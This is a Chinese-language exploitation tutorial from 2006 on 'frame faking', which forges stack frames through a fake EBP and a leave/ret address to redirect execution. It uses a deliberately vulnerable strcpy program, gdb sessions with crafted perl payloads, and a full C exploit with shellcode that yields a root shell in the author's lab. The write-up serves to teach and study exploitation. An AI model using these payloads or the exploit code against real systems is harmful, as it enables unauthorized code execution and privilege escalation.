首页 | 安全文章 | 安全工具 | Exploits | 本站原创 | 关于我们 | 网站地图 | 安全论坛
  当前位置:主页>安全文章>文章资料>系统安全>文章内容
Advanced Exploit Techique之--frame faking技术
来源:www.ph4nt0m.org 作者:axis 发布时间:2006-02-18  

Advanced Exploit Techique之--frame faking技术
(PST)

---------[ Subject : Advanced Exploit Techique之--frame faking技术 ]
---------[ Author : axis(axis@ph4nt0m.org) ]
---------[ Copyright : www.ph4nt0m.org www.secwiki.com ]
---------[ Date : 02/15/2006 ]
---------[ Version : 1.0 ]

|=-----------------------------------------------------------------------------=|

---------[ Table of Contents ]

0x210 - 前言
0x220 - frame faking原理分析
0x230 - Having Fun with Fake Frame
0x240 - frame faking拓展
0x250 - Exploit Demo
0x260 - Conclusion
0x270 - Reference

|=-----------------------------------------------------------------------------=|

---------[ 0x210 - 前言 ]
Frame Faking是针对栈的操作,伪造一个fake frame,改变程序流程,在新的栈桢里执行我们想要执行的指令。
fake frame是非常灵活的,它可以放在任何你想放且可以放的地方,可以写任何你想写且可以写的东西。用来编写exploit里面,无疑又是另外一种绕过不可执行栈保护的方法。对于不检查返回地址是否改变的不可执行栈补丁,构造fake frame的方法可以轻易绕过。对于检查函数返回地址是否改变的不可执行栈补丁像execshield这种,可以参考我的另外一篇文章《Bypass Exec-shield Under Redhat》

本文只讨论frame faking技术本身,不对绕过不可执行栈的技巧做具体说明,想进一步了解相关内容,可以参考我上面说的那篇文章。

本文的平台是Debian Linux 3.1r0

axis@debian-security:/etc$ id
uid=1000(axis) gid=1000(axis) groups=1000(axis),20(dialout),24(cdrom),25(floppy),29(audio),44(video),46(plugdev)

axis@debian-security:/etc$ uname -a
Linux debian-security 2.4.27-2-386 #1 Wed Aug 17 09:33:35 UTC 2005 i686 GNU/Linux

axis@debian-security:/etc$ cat /etc/issue.net
Debian GNU/Linux 3.1 %h
axis@debian-security:/etc$

---------[ 0x220 - frame faking原理分析 ]
我们知道,普通的buffer overflow的payload是这样写的

+++++++++++++++
| dummy | EIP |
+++++++++++++++

用dummy来填充缓冲区,直到覆盖了ebp,然后接下来再用指定的地址覆盖EIP,让程序跳转到我们指定的地址去执行。

frame faking也是基于这个基本思想。在这之前,我们先来看一个例子

axis@debian-security:~/explab/fakeframe$ cat test.c
#include<stdio.h>

void test(char *a){
char buf[256];
strcpy(buf,a);
printf("buf is: %s\n",buf);
}

void t(int n){
n=0;
n=n+1;
printf("n is : %d\n",n);
}

int main(int argc,char *argv[]){
int i;
test(argv[1]);
t(i);

return 0;
}
axis@debian-security:~/explab/fakeframe$

axis@debian-security:~/explab/fakeframe$ gcc -o test test.c
axis@debian-security:~/explab/fakeframe$

axis@debian-security:~/explab/fakeframe$ ./test AAAA
buf is: AAAA
n is : 1
axis@debian-security:~/explab/fakeframe$

正常情况下,函数test,t都会执行

axis@debian-security:~/explab/fakeframe$ gdb ./test -q
Using host libthread_db library "/lib/libthread_db.so.1".
(gdb) disass main
Dump of assembler code for function main:
0x0804841f <main+0>: push %ebp
0x08048420 <main+1>: mov %esp,%ebp
0x08048422 <main+3>: sub $0x8,%esp
0x08048425 <main+6>: and $0xfffffff0,%esp
0x08048428 <main+9>: mov $0x0,%eax
0x0804842d <main+14>: sub %eax,%esp
0x0804842f <main+16>: mov 0xc(%ebp),%eax
0x08048432 <main+19>: add $0x4,%eax
0x08048435 <main+22>: mov (%eax),%eax
0x08048437 <main+24>: mov %eax,(%esp)
0x0804843a <main+27>: call 0x80483c4 <test>
0x0804843f <main+32>: mov 0xfffffffc(%ebp),%eax
0x08048442 <main+35>: mov %eax,(%esp)
0x08048445 <main+38>: call 0x80483fa <t>
0x0804844a <main+43>: mov $0x0,%eax
0x0804844f <main+48>: leave
0x08048450 <main+49>: ret
0x08048451 <main+50>: nop
0x08048452 <main+51>: nop
... ...
End of assembler dump.
(gdb)

反汇编main可以看到,首先
push %ebp
mov %esp,%ebp

而在main返回时,则是
leave
ret

而leave指令事实则是执行了

mov %ebp,%esp
pop %ebp
的操作,与main函数的开头刚好相反。

事实上,在现在gcc的一般编译环境下,任何函数都是这样的一个过程。

那么如果我们构造如下payload

++++++++++++++++++++++++++++++++++++++
| dummy | fake EBP addr | leave addr |
++++++++++++++++++++++++++++++++++++++

用dummy填充了buffer,然后用fake frame的EBP地址来填充 EBP,用leave指令的地址来填充EIP

这样程序就会马上去执行leave指令,当leave指令执行完后,ebp的内容就成了fake frame的ebp,eip就成了fake frame 的&(ebp)+4的内容

也就是以下的一个过程

BUFFER EBP EIP
++++++++++++++++++++++++++++++++++++++
| dummy | fake EBP addr | leave addr |
++++++++++++++++++++++++++++++++++++++
|
~~~~~~~~~~~~~~~~~~~|
v
++++++++++++++++++++++++++++++++++++
fake frame | dummy new | fake ebp | fake eip |
++++++++++++++++++++++++++++++++++++

这样程序再执行的时候,就是在我们的fake frame里执行了,eip也变成了我们的fake eip
而fake frame一般是我们自己构造的,那么我们就可以在我们想要的地方,控制eip了,而不是像以前一样简单的覆盖EIP

如果程序本身将执行leave指令,那么我们甚至不需要用leave addr来覆盖EIP,而只需要覆盖到EBP,就可以完成我们的payload了!


---------[ 0x230 - Having Fun with Fake Frame ]
我们来看点实际的东西,还是上面那个test程序
有漏洞的函数是test

(gdb) disass test
Dump of assembler code for function test:
0x080483c4 <test+0>: push %ebp
0x080483c5 <test+1>: mov %esp,%ebp
0x080483c7 <test+3>: sub $0x118,%esp
0x080483cd <test+9>: mov 0x8(%ebp),%eax
0x080483d0 <test+12>: mov %eax,0x4(%esp)
0x080483d4 <test+16>: lea 0xfffffef8(%ebp),%eax
0x080483da <test+22>: mov %eax,(%esp)
0x080483dd <test+25>: call 0x80482e8 <_init+72>
0x080483e2 <test+30>: lea 0xfffffef8(%ebp),%eax
0x080483e8 <test+36>: mov %eax,0x4(%esp)
0x080483ec <test+40>: movl $0x8048574,(%esp)
0x080483f3 <test+47>: call 0x80482d8 <_init+56>
0x080483f8 <test+52>: leave
0x080483f9 <test+53>: ret
End of assembler dump.

sub $0x118,%esp

减去dummy data后,应该用268字节来覆盖ebp

(gdb) r "`perl -e 'print "A"x268,"\x44\x43\x42\x41"'`"
Starting program: /home/axis/explab/fakeframe/test "`perl -e 'print "A"x268,"\x44\x43\x42\x41"'`"
buf is: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAADCBA

Program received signal SIGSEGV, Segmentation fault.
0x41424344 in ?? ()
(gdb)

dummy的大小已经确定了
0x080483f8 <test+52>: leave test函数的leave在0x080483f8 ,我们就用这个地址好了

我们先尝试一下跳转到buffer的最开始

axis@debian-security:~/explab/fakeframe$ gdb ./test -q
Using host libthread_db library "/lib/libthread_db.so.1".
(gdb) b *test+52 =========》在leave处下个断点
Breakpoint 1 at 0x80483f8
(gdb) r "`perl -e 'print "A"x272'`"
Starting program: /home/axis/explab/fakeframe/test "`perl -e 'print "A"x272'`"
buf is: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA

Breakpoint 1, 0x080483f8 in test ()
(gdb) x/20x $esp =========》可以看到buffer的起点在0xbffff880
0xbffff870: 0x08048574 0xbffff880 0x4003130c 0xbffff8d0
0xbffff880: 0x41414141 0x41414141 0x41414141 0x41414141
0xbffff890: 0x41414141 0x41414141 0x41414141 0x41414141
0xbffff8a0: 0x41414141 0x41414141 0x41414141 0x41414141
0xbffff8b0: 0x41414141 0x41414141 0x41414141 0x41414141
(gdb)

可以看到&buffer在0xbffff880,而&buffer-4的内容是0xbffff8d0

现在,我们用我们的frame faking 的方法来看看
根据我们的payload,我们要让eip变成buffer最开始的0x41414141
那么,我们的fake ebp addr就应该是&buffer-4, 为0xbffff87c

(gdb) r "`perl -e 'print "A"x264,"\x7c\xf8\xff\xbf","\xf8\x83\x04\x08"'`"
The program being debugged has been started already.
Start it from the beginning? (y or n) y

Starting program: /home/axis/explab/fakeframe/test "`perl -e 'print "A"x264,"\x7c\xf8\xff\xbf","\xf8\x83\x04\x08"'`"
buf is: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA|?盔

Breakpoint 1, 0x080483f8 in test () =======》第一次执行leave
(gdb) c
Continuing.

Breakpoint 1, 0x080483f8 in test () =======》第二次执行leave
(gdb) c
Continuing.

Program received signal SIGSEGV, Segmentation fault.
0x41414141 in ?? ()
(gdb) i reg
eax 0x119 281
ecx 0x4014f2e0 1075114720
edx 0x119 281
ebx 0x40155880 1075140736
esp 0xbffff884 0xbffff884
ebp 0xbffff8d0 0xbffff8d0 ========》fake ebp
esi 0x40016540 1073833280
edi 0xbffff9f4 -1073743372
eip 0x41414141 0x41414141 ========》fake eip
eflags 0x246 582
cs 0x23 35
ss 0x2b 43
ds 0x2b 43
es 0x2b 43
fs 0x0 0
gs 0x0 0
(gdb) x/20x $esp
0xbffff884: 0x41414141 0x41414141 0x41414141 0x41414141
0xbffff894: 0x41414141 0x41414141 0x41414141 0x41414141
0xbffff8a4: 0x41414141 0x41414141 0x41414141 0x41414141
0xbffff8b4: 0x41414141 0x41414141 0x41414141 0x41414141
0xbffff8c4: 0x41414141 0x41414141 0x41414141 0x41414141
(gdb) x/20x $esp-16
0xbffff874: 0xbffff880 0x4003130c 0xbffff8d0 0x41414141
0xbffff884: 0x41414141 0x41414141 0x41414141 0x41414141
0xbffff894: 0x41414141 0x41414141 0x41414141 0x41414141
0xbffff8a4: 0x41414141 0x41414141 0x41414141 0x41414141
0xbffff8b4: 0x41414141 0x41414141 0x41414141 0x41414141
(gdb) x/x 0xbffff87c
0xbffff87c: 0xbffff8d0
(gdb) x/x 0xbffff880
0xbffff880: 0x41414141
(gdb)

看,正如我们所构想的那样,程序流程跳转到我们想要的地方来执行了!
新的ebp是我们的fake ebp
新的eip是我们的fake eip


---------[ 0x240 - frame faking拓展 ]

根据上面的分析,我们可以灵活多变的来构造fake frame,有时候,会带来一些有趣的东西

我们构造如下payload

|~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~|
v |
++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
| ebp addr | leave addr | dummy to fill-up buffer | fake ebp addr | leave addr |
++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
| A
| |
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~


我们把buffer的最前面构造成fake frame,用原来的ebp地址做fake ebp,eip覆盖为leave的addr,那么就构成了两个fake frame之间的循环

按照payload执行如下


(gdb) r "`perl -e 'print "\x8c\xf9\xff\xbf","\xf8\x83\x04\x08","A"x256,"\x80\xf8\xff\xbf","\xf8\x83\x04\x08"'`"
The program being debugged has been started already.
Start it from the beginning? (y or n) y

Starting program: /home/axis/explab/fakeframe/test "`perl -e 'print "\x8c\xf9\xff\xbf","\xf8\x83\x04\x08","A"x256,"\x80\xf8\xff\xbf","\xf8\x83\x04\x08"'`"
buf is: 岡緼AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA?盔

Breakpoint 1, 0x080483f8 in test ()
(gdb) c
Continuing.

Breakpoint 1, 0x080483f8 in test ()
(gdb) x/20x $esp
0xbffff990: 0xbffffb00 0xbffff9f4 0xbffff9c8 0x4003be36
0xbffff9a0: 0x00000002 0xbffff9f4 0xbffffa00 0x08048300
0xbffff9b0: 0x00000000 0x4000bcd0 0x40156d74 0x40016ca0
0xbffff9c0: 0x00000002 0x08048300 0x00000000 0x08048321
0xbffff9d0: 0x0804841f 0x00000002 0xbffff9f4 0x08048460
(gdb) x/20x $esp-16 =========》确定好我们的raw ebp的addr,在这里应该是0xbffff988
0xbffff980: 0x41414141 0x41414141 0xbffff880 0x080483f8
0xbffff990: 0xbffffb00 0xbffff9f4 0xbffff9c8 0x4003be36
0xbffff9a0: 0x00000002 0xbffff9f4 0xbffffa00 0x08048300
0xbffff9b0: 0x00000000 0x4000bcd0 0x40156d74 0x40016ca0
0xbffff9c0: 0x00000002 0x08048300 0x00000000 0x08048321

修正后重新开始

(gdb) r "`perl -e 'print "\x88\xf9\xff\xbf","\xf8\x83\x04\x08","A"x256,"\x80\xf8\xff\xbf","\xf8\x83\x04\x08"'`"
The program being debugged has been started already.
Start it from the beginning? (y or n) y

Starting program: /home/axis/explab/fakeframe/test "`perl -e 'print "\x88\xf9\xff\xbf","\xf8\x83\x04\x08","A"x256,"\x80\xf8\xff\xbf","\xf8\x83\x04\x08"'`"
buf is: ?緼AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA?盔

Breakpoint 1, 0x080483f8 in test ()
(gdb) c
Continuing.

Breakpoint 1, 0x080483f8 in test ()
(gdb) c
Continuing.

Breakpoint 1, 0x080483f8 in test ()
(gdb) c
Continuing.

Breakpoint 1, 0x080483f8 in test ()
(gdb) c
Continuing.

Breakpoint 1, 0x080483f8 in test ()
(gdb) c
Continuing.

Breakpoint 1, 0x080483f8 in test ()
(gdb) c
Continuing.

Breakpoint 1, 0x080483f8 in test ()
(gdb) c
Continuing.

Breakpoint 1, 0x080483f8 in test ()
(gdb) c
Continuing.

Breakpoint 1, 0x080483f8 in test ()
(gdb)

看,test()函数永远都执行不完了!


选择不同函数的leave addr得到的结果也不一样
我们采用main函数的leave addr看看
(gdb) disass main
Dump of assembler code for function main:
0x0804841f <main+0>: push %ebp
0x08048420 <main+1>: mov %esp,%ebp
0x08048422 <main+3>: sub $0x8,%esp
0x08048425 <main+6>: and $0xfffffff0,%esp
0x08048428 <main+9>: mov $0x0,%eax
0x0804842d <main+14>: sub %eax,%esp
0x0804842f <main+16>: mov 0xc(%ebp),%eax
0x08048432 <main+19>: add $0x4,%eax
0x08048435 <main+22>: mov (%eax),%eax
0x08048437 <main+24>: mov %eax,(%esp)
0x0804843a <main+27>: call 0x80483c4 <test>
0x0804843f <main+32>: mov 0xfffffffc(%ebp),%eax
0x08048442 <main+35>: mov %eax,(%esp)
0x08048445 <main+38>: call 0x80483fa <t>
0x0804844a <main+43>: mov $0x0,%eax
0x0804844f <main+48>: leave
0x08048450 <main+49>: ret
0x08048451 <main+50>: nop

(gdb) b *0x0804844f
Breakpoint 2 at 0x804844f
(gdb) r "`perl -e 'print "\x88\xf9\xff\xbf","\xf8\x83\x04\x08","A"x256,"\x80\xf8\xff\xbf","\x4f\x84\x04\x08"'`"
The program being debugged has been started already.
Start it from the beginning? (y or n) y

Starting program: /home/axis/explab/fakeframe/test "`perl -e 'print "\x88\xf9\xff\xbf","\xf8\x83\x04\x08","A"x256,"\x80\xf8\xff\xbf","\x4f\x84\x04\x08"'`"
buf is: ?緼AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA?縊


Breakpoint 1, 0x080483f8 in test ()
(gdb) c
Continuing.

Breakpoint 2, 0x0804844f in main ()
(gdb) c
Continuing.

Breakpoint 1, 0x080483f8 in test ()
(gdb) c
Continuing.

Breakpoint 2, 0x0804844f in main ()
(gdb) c
Continuing.

Breakpoint 1, 0x080483f8 in test ()
(gdb) c
Continuing.

Breakpoint 2, 0x0804844f in main ()
(gdb)


程序开始在test()函数和main()函数之间来回打转了!

我们可以看的更加细一些

(gdb) disass frame_dummy
Dump of assembler code for function frame_dummy:
0x08048390 <frame_dummy+0>: push %ebp
0x08048391 <frame_dummy+1>: mov %esp,%ebp
0x08048393 <frame_dummy+3>: sub $0x8,%esp
0x08048396 <frame_dummy+6>: mov 0x8049674,%eax
0x0804839b <frame_dummy+11>: test %eax,%eax
0x0804839d <frame_dummy+13>: je 0x80483c0 <frame_dummy+48>
0x0804839f <frame_dummy+15>: mov $0x0,%eax
0x080483a4 <frame_dummy+20>: test %eax,%eax
0x080483a6 <frame_dummy+22>: je 0x80483c0 <frame_dummy+48>
0x080483a8 <frame_dummy+24>: movl $0x8049674,(%esp)
0x080483af <frame_dummy+31>: call 0x0
0x080483b4 <frame_dummy+36>: lea 0x0(%esi),%esi
0x080483ba <frame_dummy+42>: lea 0x0(%edi),%edi
0x080483c0 <frame_dummy+48>: mov %ebp,%esp ======》注意这里,实际上就是开始leave
0x080483c2 <frame_dummy+50>: pop %ebp
0x080483c3 <frame_dummy+51>: ret
End of assembler dump.
(gdb) b *0x080483c2
Breakpoint 3 at 0x80483c2
(gdb) b *0x080483c0
Breakpoint 4 at 0x80483c0
(gdb) r "`perl -e 'print "\x88\xf9\xff\xbf","\xf8\x83\x04\x08","A"x256,"\x80\xf8\xff\xbf","\xc2\x83\x04\x08"'`"
The program being debugged has been started already.
Start it from the beginning? (y or n) y

Starting program: /home/axis/explab/fakeframe/test "`perl -e 'print "\x88\xf9\xff\xbf","\xf8\x83\x04\x08","A"x256,"\x80\xf8\xff\xbf","\xc2\x83\x04\x08"'`"

Breakpoint 4, 0x080483c0 in frame_dummy ()
(gdb) c
Continuing.

Breakpoint 3, 0x080483c2 in frame_dummy ()
(gdb) c
Continuing.
buf is: ?緼AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA?柯

Breakpoint 1, 0x080483f8 in test ()
(gdb) c
Continuing.

Breakpoint 3, 0x080483c2 in frame_dummy ()
(gdb) c
Continuing.

Program received signal SIGILL, Illegal instruction. ========>光是pop %ebp 是不行的
0xbffff9f4 in ?? ()
(gdb) r "`perl -e 'print "\x88\xf9\xff\xbf","\xf8\x83\x04\x08","A"x256,"\x80\xf8\xff\xbf","\xc0\x83\x04\x08"'`"
The program being debugged has been started already.
Start it from the beginning? (y or n) y

Starting program: /home/axis/explab/fakeframe/test "`perl -e 'print "\x88\xf9\xff\xbf","\xf8\x83\x04\x08","A"x256,"\x80\xf8\xff\xbf","\xc0\x83\x04\x08"'`"

Breakpoint 4, 0x080483c0 in frame_dummy ()
(gdb) c
Continuing.

Breakpoint 3, 0x080483c2 in frame_dummy ()
(gdb) c
Continuing.
buf is: ?緼AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA?坷

Breakpoint 1, 0x080483f8 in test ()
(gdb) c
Continuing.

Breakpoint 4, 0x080483c0 in frame_dummy ()
(gdb) c
Continuing.

Breakpoint 3, 0x080483c2 in frame_dummy ()
(gdb) c
Continuing.

Breakpoint 1, 0x080483f8 in test ()
(gdb) c
Continuing.

Breakpoint 4, 0x080483c0 in frame_dummy ()
(gdb) c
Continuing.

Breakpoint 3, 0x080483c2 in frame_dummy ()
(gdb) c
Continuing.

Breakpoint 1, 0x080483f8 in test ()
(gdb) c
Continuing.

Breakpoint 4, 0x080483c0 in frame_dummy ()
(gdb) c
Continuing.

Breakpoint 3, 0x080483c2 in frame_dummy ()
(gdb) c
Continuing.

Breakpoint 1, 0x080483f8 in test ()
(gdb) c
Continuing.

Breakpoint 4, 0x080483c0 in frame_dummy ()
(gdb)

所以,我们payload需要的leave指令实际上是只要执行mov %ebp,%esp

通过构造fake frame,可以随心所欲的控制程序流程,你可以把一个函数执行了一遍又一遍,你就是上帝!

---------[ 0x250 - Exploit Demo ]

终于到重点了。
利用fake frame来获得系统控制权的方法实在是太灵活多样了,因为整个frame完全是你faking出来的,那么实际上就是欺骗程序让它来执行你指定的流程。

比如,你可以把fake frame的eip设定为shellcode的地址,又或者把fake frame的eip设定为return into libc所需要的函数入口地址。

怎样随心所欲就要看你的想象力和创造力了。

比较复杂的一种方法就是构造个与原来的frame非常相似的fake frame

比如,原来的函数里是原来的frame是

++++++++++++++++++++++++++++++++++++++++++++
| &printf | addr of AAAA |raw ebp |raw eip |
++++++++++++++++++++++++++++++++++++++++++++

这里的raw eip应该是整个函数的ret
原本会执行 prinf("AAAA");的操作

但如果构造了 fake frame,通过frame faking改变流程后

构造的fake frame 如下

+++++++++++++++++++++++++++++++++++++++++++++++
| &system | addr of /bin/sh |raw ebp |raw eip |
+++++++++++++++++++++++++++++++++++++++++++++++

fake ebp和fake eip都和raw ebp,raw eip一样,而前面的函数则用system替换
那么这个时候程序就会执行 system("/bin/sh");

这种方法是要在整个frame里寻找一个“有用”的函数,来让我们顺利的构造fake frame

具体请参考gotfault上的一篇文章《Function Stack Frame Manipulation》


这里我们简单演示下如果利用fake frame来写exploit

我们的payload很简单

&buffer(fake ebp) (fake eip) (&buffer+8) (fake ebp addr)
++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
| 4 bytes dummy | &buffer+8 | NOPS | shellcode | &buffer | leave addr |
++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
A | A |
| | | |
| ~~~~~~~~~~~~ |
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

这里说个小插曲
vangelis在他的paper《Stack-based Overflow Exploit: Introduction to Classical and Advanced Overflow Technique》里
提到的frame faking 时,构造的exp是错误的
他的payload没错

------------------------------------------------------
| data to overflow buffer | fake_ebp0 | leaveret |
------------------------------------------------------

但在演示的时候,他直接把fake_ebp0用shellcode的地址替换了,这就不正确了
在他的paper中,他直接把EIP给覆盖成了shellcode地址,所以他演示成功了

但实际上,应该是用leaveret来覆盖EIP,fake_ebp0应该是fake_ebp1的地址
而fake_eip1才应该是shellcode的地址.


回到本文上来.根据我们上面提出的payload,我们构造如下exploit
axis@debian-security:~/explab/fakeframe$ cat ex_framefaking.c
/*

fake frame demo exploit
coded by axis
axis@ph4nt0m.org

use payload
| dummy | fake ebp0 | main's leave ret addr|

here is

| dummy 4 bytes to fake ebp | fake eip, addr of buf +8 to nops | NOPS | shellcode | fake ebp,here use addr of buf(overwrite the ebp) | vul's main()'s leave|

*/

#include<stdio.h>

char shellcode[]=
"\x55\x89\xe5\x55\x89\xe5\x83\xec\x28\xc6\x45\xd8\x2f\xc6\x45\xdc\x2f\xc6\x45\xd9\x5f\xc6\x45\xda\x5a\xc6\x45\xdb\x5f\xc6\x45\xdd\x5f\xc6\x45\xde\x5f\x83\x45\xd9\x03\x83\x45\xda\x0f\x83\x45\xdb\x0f\x83\x45\xdd\x14\x83\x45\xde\x09\x31\xc0\x89\x45\xdf\x89\x45\xf4\x8d\x45\xd8\x89\x45\xf0\x83\xec\x04\x8d\x45\xf0\x31\xd2\x89\xd3\x89\xc1\x8b\x45\xf0\x89\xc3\x31\xc0\x83\xc0\x0b\xcd\x80\x31\xc0\x40\xcd\x80"; //这段shellcode是teso的一段bind shellcode,100 bytes,放到这里大材小用了

int main(int argc,char *argv[]){
char buf[272];
char *args[]={"./test",buf,NULL};

memset(buf,0x90,sizeof(buf));
memcpy(buf+130,shellcode,100);

memcpy(buf+4,"\xdb\xfe\xff\xbf",4); // buf + 8 's addr ===>nops

memcpy(buf+264,"\xd3\xfe\xff\xbf",4); //buf's addr to overwrite the ebp


memcpy(buf+268,"\x4f\x84\x04\x08",4); // main's leave addr


execve("./test",args,NULL);

return 0;

}
axis@debian-security:~/explab/fakeframe$


axis@debian-security:~/explab/fakeframe$ gcc -o ex_framefaking ex_framefaking.c
axis@debian-security:~/explab/fakeframe$

axis@debian-security:~/explab/fakeframe$ ./ex_framefaking E?覊訅翄E饓?纼
buf is: 悙悙埝繍悙悙悙悙悙悙悙悙悙悙悙悙悙悙悙悙悙悙悙悙悙悙悙E貕E饍悙悙悙悙悙悙悙悙蛝1繞蛝悙悙悙悙悙悙悙悙悙悙悙悙悙悙悙悙悙誉縊悙悙悙怳夊U夊冹(艵?艵?艵賍艵赯艵踎艵輄艵轤僂僂僂僂僂 1缐E邏E @e@4?@
sh-2.05b# id
uid=1000(axis) gid=1000(axis) euid=0(root) groups=1000(axis),20(dialout),24(cdrom),25(floppy),29(audio),44(video),46(plugdev)
sh-2.05b# uname -a
Linux debian-security 2.4.27-2-386 #1 Wed Aug 17 09:33:35 UTC 2005 i686 GNU/Linux
sh-2.05b# cat /etc/issue.net
Debian GNU/Linux 3.1 %h
sh-2.05b#

看!我们成功拿到rootshell了!


---------[ 0x260 - Conclusion ]
frame faking是一种高级的exploit技术,形式非常灵活,是写exploit的强大武器,在很多不可执行栈保护的补丁下仍然有用武之地。更为灵活的利用方式,有赖于丰富的想象力和创造力。

Thanks to all guys from ph4nt0m!

Welcome to Ph4nt0m!
http://www.ph4nt0m.org

Welcome to Secwiki!
http://www.secwiki.com

---------[ 0x270 - Reference ]
《Function Stack Frame Manipulation》 by barros A.K.A Carlos Barros
http://gotfault.net/knowledge/module/0x300/0x300-MODULE.txt

《The advanced return-into-lib(c) exploits》 by Nergal
http://www.phrack.org/phrack/58/p58-0x04

《绕过Pax内核补丁保护的方法浅析---高级的return-into-lib(c) exploits技术》 by alert7
http://elfhack.whitecell.org/mydocs/p58-0x04(cn).txt

-EOF-


 
[推荐] [评论(0条)] [返回顶部] [打印本页] [关闭窗口]  
匿名评论
评论内容:(不能超过250字,需审核后才会公布,请自觉遵守互联网相关政策法规。
 §最新评论:
  热点文章
·Windows 系统调用功能列表
·windows入侵提权-创建隐藏帐号(
· CC_STACKPROTECTOR防止内核stac
·Linux内核安全研究之Stack Overf
· Exploit The Linux Kernel NULL
·Kernel Locking 中文版
·IA32上Linux内核中断机制分析
·Award BIOS Rootkit,universal
·PHP代码审计
·N种内核注入DLL的思路及实现
·glibc 2.3.5 的一些新安全特性
·Struts2/XWork < 2.2.0 Remote C
  相关文章
·Windows平台内核级文件访问
·Bypass Exec-shield Under Redha
·Kernel Mode Sockets Library
·Radmin服务端保持连接不断问题分
·Kernel Locking 中文版
·浅析恒基伟业F8隐形手机的隐形功
·智能化防杀未知电脑病毒探讨
·IA32上Linux内核中断机制分析
·扭曲变换加密
·AIX 内核的文件操作流程
·VISTA用户内存安全保护漫谈之saf
·Windows Server 2003 安全配置实
  推荐广告
CopyRight © 2002-2022 VFocuS.Net All Rights Reserved